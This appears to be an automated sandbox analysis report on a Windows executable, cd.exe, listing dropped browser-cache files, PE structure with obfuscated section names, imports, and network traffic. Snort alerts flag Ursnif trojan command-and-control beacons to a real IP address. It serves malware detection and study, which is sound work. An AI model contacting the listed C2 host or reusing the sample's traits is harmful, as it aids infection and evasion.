                                                                                                                                                                      Preview: <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><link href="/manifest?pwa=webhp" crossorigin="use-credentials" rel="manifest"><title>Google</title><script nonce="sBDQvviEJYE6GoG6F/T2Gw==">(function(){window.google={kEI:'rKtAYY2rHY25kwWZrp3YAw',kEXPI:'31',kBL:'myGb'};google.sn='webhp';google.kHL='en-GB';})();(function(){.var f=this||self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}.function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei="+l(d),-1===b.search("&lei=")&&(d=m(d))&&(e+="&lei="+d));d="";!c&&f._cshid&&-1===b.search("&cshid=")&&"slh"!==a&&(d="&cshid="+f._cshid);c=c||"/"+(g||"gen_204")+"?atyp=i&ct="+a+
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\rs=AA2YrTt5urjnc1-as0vV15aU6T-f2ANE9g[1].css
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):235
                                                                                                                                                                      Entropy (8bit):5.054129687067898
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:EZwTcqcA2n6gt9VvKcZWbnRVIM6RoeSjIUVY/:EZfqcA26gAcZWfp6SVY/
                                                                                                                                                                      MD5:2B1D2EF81983F949B10A03ECE9D6B80C
                                                                                                                                                                      SHA1:C171F9C15235F09A1E0397A5F47DF4D712E91550
                                                                                                                                                                      SHA-256:B3B95456B6C2CD4D41EAEB10DC4291970EBB430F6E538A4DAF99F8369A1F7101
                                                                                                                                                                      SHA-512:439F8992A36C3BBD3E65318B236CA58D80FFC5DC100B3B31BF4ACD238D9021DBF46DDAB3D32670C477FC155BB1991B75D807E392923B3801B2FBBC9D02EAF1B4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .gb_Qe{background:rgba(60,64,67,0.90);border-radius:4px;color:#ffffff;font:500 12px 'Roboto',arial,sans-serif;letter-spacing:.8px;line-height:16px;margin-top:4px;min-height:14px;padding:4px 8px;position:absolute;z-index:1000}sentinel{}
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\desktop_searchbox_sprites318_hr[1].png
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:PNG image data, 40 x 124, 8-bit colormap, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):779
                                                                                                                                                                      Entropy (8bit):7.376883204451902
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:36kAKAyMhGb5AHgK7+Wpf3sNQV34DVvN9sck:3vAKzVb5wuo3+1Jxk
                                                                                                                                                                      MD5:03E471800AFFD719388000AA2356DE1F
                                                                                                                                                                      SHA1:42E718342BD7F6EDF4899E161A77452DCBAC68F5
                                                                                                                                                                      SHA-256:BC23B3B207E8FA55B0C65A00F3FED491FA9EB5B1B39D159E7C4921BD331135EC
                                                                                                                                                                      SHA-512:BFA4329D35568F4F50AC2B05917AECB4AD3A4A69F8B7248E6D39CEA94F90C231B022C705ED1255F930271DB2BF5286F4B24BE6756A61E928B0D0723747D40081
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .PNG........IHDR...(...|.....,?.....{PLTE..............................................................................................................................5...)tRNS.......`..0. p`.. ...@...p.P.._.@P0.o@P.|:8.....IDATx.....0..a...,'....9jz...S<..#.'...O..-e....n`.X...M^.ka..r.....:...'@.WCA.G.F`[i...r.X.....,....`..2`../g.<...:.Cg@ ....M...@w.C..ix`o...8.....?..@..Z.r.@.Wf..,.......z.....~B...y~.b.je]_...p......:YR*.....4W..{>.}r%.~..$..........C.B..@..;...*.p.......4.gg.Muo...;B4..#.....5L..F.j..F.5...|.'x.`.O.-,-...:.....'....~.....,uj...y|......v.....b..;......./kfm...ck'2.".....b&aru..@b.B{h.&.H.7*:.)..d.W.\z...{......a.Bx_...<.?..M8C....,8.....S....T...... .Y.n].A~*.j.Pt*KNe.,:.'..J.M.......Wt.#)[..w....IEND.B`.
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\googlelogo_color_272x92dp[1].png
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:PNG image data, 544 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):13504
                                                                                                                                                                      Entropy (8bit):7.934568436975546
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:gwSYjn2PH6WNa7cr7FliUuaJ78UOr0raQR:gOn2PaWNks7ziUuagJ0lR
                                                                                                                                                                      MD5:80FA4BCAB0351FDCCB69C66FB55DCD00
                                                                                                                                                                      SHA1:26F471F6EBE3B11557506F6AE96156E0A3852E5B
                                                                                                                                                                      SHA-256:262084257C2103702EF8A25705E3F8DBC1FA3823103AD7B954D54BDB77E6D89D
                                                                                                                                                                      SHA-512:B87A7554C5108400483EDAE585DAC672DEA6FE0DCD51CF5F73B4F9947649607F9C97B3B410FC0259BC2E0C60951DF2431323C1C7485A74291C23D999CFC32E17
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .PNG........IHDR... ..........#W...4.IDATx.....%?...m.}....(.Y:..n..z..m....w.$=.....^....N.g...|.._".X.......v.....O.Z.y.v*.#.........O4....oR.}Y......f._.i.[..xf.*eC.nnIt...........9..?.y.n.-^..P....i..G..6|_Z..2...e)$*..ht.2a......Ebu...6....2..V6..B ..L..pS.~.....[u......`V?....*....Q....e........J.|l$....Y..i..4....gW.../.....h...f....W+..N.E..e..p....+..8.....R.#..7..P..J.P.u..e.e:\...Q.H........2.O~ ..deC.8:.........z. @.G........p /......... @..gI...[I|...:..][m..H............=..7.c.txH...H....2u....%..6.B`l:i.!.mQ$......d.o=..l.Q.y.Yw..Y$......d*{=...D..5........#@Z.x......w....cO...4...i..e..*...7J=..H.@C. .F.|...Q.zz".Zi.hP..G.....Y?.dhA.I.......[........n...?CY......2.~i.......(..S.]..hI...[>."d....#..5F....Q.?/...89.<...t..../.)>..r^.....Dbc..p:.4m....U....4.;.Ft.Ft.4...:..5?<?m..!_.We._...#.0...".k)L..|Yz.t./.. >...A..d...+..4.]...iz.H.[.x+.W..]2.&............e.L.q......H.....S....@.....j..W6.5].......}Z$f..L.Y?..p:..
                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\index[1].htm
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):62
                                                                                                                                                                      Entropy (8bit):4.673133052883317
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:nmNjJMzVJu+1v3pY1sK3uqn:GMRJVxYr3uqn
                                                                                                                                                                      MD5:2A54A8CB5733591ED39A9B22AD0D31EC
                                                                                                                                                                      SHA1:D3FD4F9D291464480866127810E89DBE410CC41B
                                                                                                                                                                      SHA-256:06FA9277A7F41DB91096AF3B9087516502F99EC5C62209D8F20426621EE1909F
                                                                                                                                                                      SHA-512:C673009AF39B5D992217E1109134281A3F48AB316E5A1F515A5A7509D8693818FA68328EFC0816BE5956BA79F87D0BB72899EC83F8E02827BF27170B5DE1D830
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: <meta http-equiv="refresh" content="0;URL= http://google.com">
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):89
                                                                                                                                                                      Entropy (8bit):4.484538240999641
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:oVXUtuCiPSdH8JOGXnEtuCiPSgun:o9UtugdHqEtugB
                                                                                                                                                                      MD5:FFC4B0966C043C7AC64A6D2462E63BF6
                                                                                                                                                                      SHA1:AADA1A11D642490C8D86635B12F8940F51AB64D4
                                                                                                                                                                      SHA-256:9F7112871FF782AC0CF220553CD17EB89965EE6F2BEAC59A692511A6D8718A2C
                                                                                                                                                                      SHA-512:523586F898A14A5731854B1BE50BA63EF7E506E81BE97AD8C5EB5B00A1F62FD1DCE6541959CEF49E7B5B7161787C2B1B31097CE552D323C7079F0F0B1257797F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: [2021/09/14 16:03:18.137] Latest deploy version: ..[2021/09/14 16:03:18.137] 11.211.2 ..
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF1C6E09CA4CF5EBDD.TMP
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):12933
                                                                                                                                                                      Entropy (8bit):0.40677040396038333
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:c9lLh9lLh9lIn9lIn9loSA9loSQ9lWSh1VI01iTF:kBqoIkaQbzo
                                                                                                                                                                      MD5:1DC22578617F1D3488CEB85FA0083C56
                                                                                                                                                                      SHA1:E0721DE9D8304D3BC7E550E148E247A426D0B681
                                                                                                                                                                      SHA-256:98B9D07C5D265759E63062020EAFB755B6FB9D5B22630810881C7DC532D94FFB
                                                                                                                                                                      SHA-512:67941D6A1BDFF429348115DB251445445C8BEB922759E2F28BC8E5DA8B9BF697B8F5039158C253867F1BBCCAA4FC8B2BCB7F7A517143CB6349CF5CD9F7DB1AAF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFFAD0E470126C2D77.TMP
                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):51081
                                                                                                                                                                      Entropy (8bit):0.40980137997176297
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+6cGPcAQTTkOngHy85yg:kBqoxKAuqR+6cGPcAQ/kOngHy85yg
                                                                                                                                                                      MD5:ABA48F42A2D4459A35A1B6EF13FC8BFA
                                                                                                                                                                      SHA1:99CF9B826ADE51440E84043F1463A1CE4AA4EAA5
                                                                                                                                                                      SHA-256:92324F8734EE3288E2E31FE2331EF0C7899E4556B263C4AD2016AEB81C9EAE27
                                                                                                                                                                      SHA-512:B95C9CE22677F1C302B885F943A2DFFB738441D1F794E84E6355C5A44E9B748A3645344FE5950C5487D0959E10E6DF05B753A523D80614E52AA41A796F719E0A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):5.362341936277573
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:cd.exe
                                                                                                                                                                      File size:3922432
                                                                                                                                                                      MD5:cd02e745a08dd29cb6fda1761b2f4b6e
                                                                                                                                                                      SHA1:1a0dd3348bb0f856fff51f7e22364b0974fa1ad3
                                                                                                                                                                      SHA256:a4ff2e7dd35e8f7362739c3a578563458548ed5ffb30abe5ec6bf6f2c0de8eb7
                                                                                                                                                                      SHA512:f6c55fbb6ebf25f046f6d562d1c17d4503f8244f367f1dd64270ff8a9be56b6ed9c92dedd111359fa91d5ed8650773310f609c447baa0b1b4a9ee486143b2ca4
                                                                                                                                                                      SSDEEP:24576:BuuP1xP+9mrnv/6dh3Qh3OXuaq4gTeEu8Ct+M3VUXeN5DB:BtPHG6dZ4gTq8u+1Xq
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@L..!"^.!"^.!"^.s.^.!"^.s.^.!"^.s.^.!"^.Y.^.!"^.!#^.!"^.Y.^.!"^.s.^.!"^.Y.^.!"^Rich.!"^........................PE..L.G.2..T...

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:00828e8e8686b000

                                                                                                                                                                      Static PE Info

                                                                                                                                                                      General

                                                                                                                                                                      Entrypoint:0x4036f7
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                      Time Stamp:0x54941332 [Fri Dec 19 11:59:46 2014 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:6
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:ebc536e497c338b5abee5455de5bead2

                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                      Instruction
                                                                                                                                                                      call 00007F44F8AE2DE7h
                                                                                                                                                                      jmp 00007F44F8ADFF65h
                                                                                                                                                                      push 00000014h
                                                                                                                                                                      push 0042E750h
                                                                                                                                                                      call 00007F44F8AE1498h
                                                                                                                                                                      call 00007F44F8AE2FB8h
                                                                                                                                                                      movzx esi, ax
                                                                                                                                                                      push 00000002h
                                                                                                                                                                      call 00007F44F8AE2D7Ah
                                                                                                                                                                      pop ecx
                                                                                                                                                                      mov eax, 00005A4Dh
                                                                                                                                                                      cmp word ptr [00400000h], ax
                                                                                                                                                                      je 00007F44F8ADFF66h
                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                      jmp 00007F44F8ADFF95h
                                                                                                                                                                      mov eax, dword ptr [0040003Ch]
                                                                                                                                                                      cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                                                                      jne 00007F44F8ADFF4Dh
                                                                                                                                                                      mov ecx, 0000010Bh
                                                                                                                                                                      cmp word ptr [eax+00400018h], cx
                                                                                                                                                                      jne 00007F44F8ADFF3Fh
                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                      cmp dword ptr [eax+00400074h], 0Eh
                                                                                                                                                                      jbe 00007F44F8ADFF6Bh
                                                                                                                                                                      cmp dword ptr [eax+004000E8h], ebx
                                                                                                                                                                      setne bl
                                                                                                                                                                      mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                                      call 00007F44F8AE2539h
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      jne 00007F44F8ADFF6Ah
                                                                                                                                                                      push 0000001Ch
                                                                                                                                                                      call 00007F44F8AE0041h
                                                                                                                                                                      pop ecx
                                                                                                                                                                      call 00007F44F8AE2495h
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      jne 00007F44F8ADFF6Ah
                                                                                                                                                                      push 00000010h
                                                                                                                                                                      call 00007F44F8AE0030h
                                                                                                                                                                      pop ecx
                                                                                                                                                                      call 00007F44F8AE2DF3h
                                                                                                                                                                      and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                      call 00007F44F8AE2523h
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      jns 00007F44F8ADFF6Ah
                                                                                                                                                                      push 0000001Bh
                                                                                                                                                                      call 00007F44F8AE0016h
                                                                                                                                                                      pop ecx
                                                                                                                                                                      call dword ptr [0042602Ch]
                                                                                                                                                                      mov dword ptr [0043DFFCh], eax
                                                                                                                                                                      call 00007F44F8AE2E0Eh
                                                                                                                                                                      mov dword ptr [00434708h], eax
                                                                                                                                                                      call 00007F44F8AE27B1h
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      jns 00007F44F8ADFF6Ah

                                                                                                                                                                      Rich Headers

                                                                                                                                                                      Programming Language:
                                                                                                                                                                      • [ C ] VS2013 build 21005
                                                                                                                                                                      • [LNK] VS2013 UPD3 build 30723
                                                                                                                                                                      • [C++] VS2013 build 21005
                                                                                                                                                                      • [ASM] VS2013 build 21005
                                                                                                                                                                      • [RES] VS2013 build 21005
                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                      Data Directories

                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2ebb00x28.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e0000x1e0.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x261500x38.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2df000x40.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x260000x104.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                      Sections

                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x10000x24b620x24c00False0.764774659864data6.93749374769IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rdata0x260000x91820x9200False0.418049015411data4.70373356685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .data0x300000xe0000x4800False0.351616753472data3.54953091809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .rsrc0x3e0000x1e00x200False0.53125data4.71767883295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      aZAqrnJo0x3f0000x38190x3a00False0.371901939655data4.84589461101
                                                                                                                                                                      BGOllIzc0x430000x48960x4a00False0.430796030405data4.44387669298
                                                                                                                                                                      yQtoRARz0x480000xcbc00xcc00False0.348268995098data4.58448491924
                                                                                                                                                                      dZLJZOuu0x550000x603590x60400False0.332028713474data4.87800746939
                                                                                                                                                                      sdDGHbsk0xb60000x183850x18400False0.45299412049data5.29827826108
                                                                                                                                                                      cQfsAIeK0xcf0000x3eeae0x3f000False0.307458302331data5.32329417249
                                                                                                                                                                      nJjdtQIB0x10e0000xff4f0x10000False0.380676269531data4.75106212908
                                                                                                                                                                      pcHOcQzM0x11e0000x607b0x6200False0.496970663265data5.22222913281
                                                                                                                                                                      wDcvvqlu0x1250000xa6290xa800False0.457333519345data5.40009906885
                                                                                                                                                                      orXBiygL0x1300000x28f160x29000False0.254954268293data4.87572841572
                                                                                                                                                                      AiZKCfrK0x1590000x3c8b0x3e00False0.276272681452data3.80209006598
                                                                                                                                                                      myoGvTPf0x15d0000x27a0x400False0.330078125data3.13663618281
                                                                                                                                                                      AVTlzkED0x15e0000x41620x4200False0.383877840909data4.89078285751
                                                                                                                                                                      bzLENpIH0x1630000x889a0x8a00False0.345957880435data4.43979752948
                                                                                                                                                                      XcYnViEt0x16c0000x598250x59a00False0.332216483612SysEx File -5.94377045532
                                                                                                                                                                      mbKhPZXg0x1c60000x9440xa00False0.384375data4.46068376218
                                                                                                                                                                      lUpFJlcq0x1c70000x930x200False0.150390625data1.08603487889
                                                                                                                                                                      yiDSdvAK0x1c80000x29c490x29e00False0.292000932836data6.01702880808
                                                                                                                                                                      tWLpgAgw0x1f20000x1d3fb0x1d400False0.329794337607data4.73500817041
                                                                                                                                                                      bTGdVUjl0x2100000x1c1420x1c200False0.322222222222data4.78096652478
                                                                                                                                                                      ziIDaoXi0x22d0000xbd620xbe00False0.364823190789data4.66321532752
                                                                                                                                                                      LzawvTwX0x2390000x216260x21800False0.1875data3.92488643682
                                                                                                                                                                      LnIDzdzd0x25b0000x80000x8000False0.382080078125data4.73126113063
                                                                                                                                                                      wkCXpCGo0x2630000x44a50x4600False0.351897321429data4.65104155262
                                                                                                                                                                      nqpeKqho0x2680000x828a0x8400False0.332682291667data4.39080198834
                                                                                                                                                                      MRjgEOqy0x2710000x1cca0x1e00False0.403776041667data5.16290821803
                                                                                                                                                                      JcLmCXgA0x2730000xb8dc0xba00False0.34627016129data4.63415459895
                                                                                                                                                                      OtycdIdu0x27f0000x106490x10800False0.418235085227data5.25113561119
                                                                                                                                                                      IbVOTdPC0x2900000x4b50x600False0.34375data3.25550625419
                                                                                                                                                                      FgFHDyjf0x2910000x107750x10800False0.400153882576data4.92204812869
                                                                                                                                                                      ybeqBvHg0x2a20000xa6630xa800False0.433430989583data5.16751770906
                                                                                                                                                                      IbzUQYJs0x2ad0000x317f0x3200False0.33484375data5.16903653942
                                                                                                                                                                      AQBgSYnS0x2b10000x30010x3200False0.395390625data5.13205626758
                                                                                                                                                                      XxFUmGWX0x2b50000x7fa30x8000False0.342498779297data4.64166784079
                                                                                                                                                                      afVQQtfj0x2bd0000x17660x1800False0.4306640625data5.22679049555
                                                                                                                                                                      nwvMTysA0x2bf0000x95de0x9600False0.408567708333data4.91622055711
                                                                                                                                                                      ZHPQhgLD0x2c90000x31ea0x3200False0.443125data5.40153365825
                                                                                                                                                                      pxMMJkwk0x2cd0000xf4a00xf600False0.285410315041data4.15839164982
                                                                                                                                                                      JXHCNYcJ0x2dd0000x6450x800False0.384765625data3.87209019024
                                                                                                                                                                      lYRopDTG0x2de0000x46ef0x4800False0.217881944444data3.87911693157
                                                                                                                                                                      bcYTpMaT0x2e30000xb1b40xb200False0.446980337079data5.30459672358
                                                                                                                                                                      nuBezWiu0x2ef0000xef160xf000False0.266731770833data4.54407396418
                                                                                                                                                                      yPvpmSBg0x2fe0000x7d390x7e00False0.324776785714data4.31832937377
                                                                                                                                                                      OoEfGgTM0x3060000x22390x2400False0.461805555556data4.81294100952
                                                                                                                                                                      kYRGCWEC0x3090000x135600x13600False0.361365927419data4.61084789586
                                                                                                                                                                      ssiFbfZW0x31d0000xfd200xfe00False0.397991510827data4.83645609944
                                                                                                                                                                      KHKSQqok0x32d0000x2e910x3000False0.551106770833data6.15665163676
                                                                                                                                                                      NcZcjaDP0x3300000x8baf0x8c00False0.358286830357data4.53824163163
                                                                                                                                                                      mIUEylgT0x3390000x2abec0x2ac00False0.225660179094data3.89084100028
                                                                                                                                                                      lluFjCpP0x3640000x12420x1400False0.3734375data4.01527750922
                                                                                                                                                                      BHqNuAAF0x3660000x2fe50x3000False0.404296875data5.07399713959
                                                                                                                                                                      dWFkhiaJ0x3690000xe12b0xe200False0.451552129425data5.04492106469
                                                                                                                                                                      NeKPPFmp0x3780000x10dc0x1200False0.41015625data4.74787400821
                                                                                                                                                                      mRaJxCpw0x37a0000x2d550x2e00False0.40090013587data5.08071078207
                                                                                                                                                                      sjZRApAc0x37d0000x51e60x5200False0.340224847561data4.57864669136
                                                                                                                                                                      mJuapRBt0x3830000x28960x2a00False0.399181547619data5.11002345911
                                                                                                                                                                      AUQwTDRB0x3860000x65130x6600False0.320465686275data4.31847897425
                                                                                                                                                                      Mzpcxreq0x38d0000x82bc0x8400False0.261156486742data3.767572246
                                                                                                                                                                      DQLewjlc0x3960000x22a90x2400False0.397135416667data5.07745042262
                                                                                                                                                                      yQzDovRx0x3990000x1870x200False0.44140625data2.58744007464
                                                                                                                                                                      KsasGyWE0x39a0000x341c0x3600False0.452618634259data4.59764407477
                                                                                                                                                                      qALhWEsZ0x39e0000x9780xa00False0.408984375data4.298132059
                                                                                                                                                                      EhLKChYp0x39f0000xc9c70xca00False0.356725711634data4.56772549135
                                                                                                                                                                      juiuAwmE0x3ac0000x8050xa00False0.3203125data3.84392745238
                                                                                                                                                                      FPCcnPuO0x3ad0000x300660x30200False0.185328733766data5.48813033427
                                                                                                                                                                      DQPOFovS0x3de0000x2e490x3000False0.396647135417data5.03014687317
                                                                                                                                                                      eeLebknr0x3e10000x165f0x1800False0.357421875data3.82572779856

                                                                                                                                                                      Resources

                                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                                      RT_MANIFEST0x3e0600x17dXML 1.0 document textEnglishUnited States

                                                                                                                                                                      Imports

                                                                                                                                                                      DLLImport
                                                                                                                                                                      KERNEL32.dllExitProcess, GetModuleHandleW, WideCharToMultiByte, LoadLibraryW, Sleep, GetModuleFileNameW, GetTempPathW, VirtualProtect, GetCurrentProcessId, EncodePointer, DecodePointer, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, IsProcessorFeaturePresent, GetLastError, GetModuleHandleExW, GetProcAddress, MultiByteToWideChar, HeapSize, HeapFree, HeapAlloc, SetLastError, GetCurrentThreadId, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, WriteFile, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EnterCriticalSection, LeaveCriticalSection, LoadLibraryExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, HeapReAlloc, LCMapStringW, OutputDebugStringW, GetStringTypeW, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetStdHandle, SetFilePointerEx, WriteConsoleW, CloseHandle, CreateFileW

                                                                                                                                                                      Possible Origin

                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                      09/14/21-16:03:19.921633TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4973780192.168.2.6173.239.8.164
                                                                                                                                                                      09/14/21-16:03:19.921633TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4973780192.168.2.6173.239.8.164
                                                                                                                                                                      09/14/21-16:03:20.611062TCP2030821ET MALWARE Win32/Zonebac Traffic Redirect4973780192.168.2.6173.239.8.164

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Sep 14, 2021 16:03:19.816663980 CEST4973780192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:19.817102909 CEST4973880192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:19.919540882 CEST8049737173.239.8.164192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:19.919682980 CEST4973780192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:19.919892073 CEST8049738173.239.8.164192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:19.919953108 CEST4973880192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:19.921633005 CEST4973780192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:20.024296999 CEST8049737173.239.8.164192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:20.024328947 CEST8049737173.239.8.164192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:20.024430990 CEST4973780192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:20.027059078 CEST4973780192.168.2.6173.239.8.164
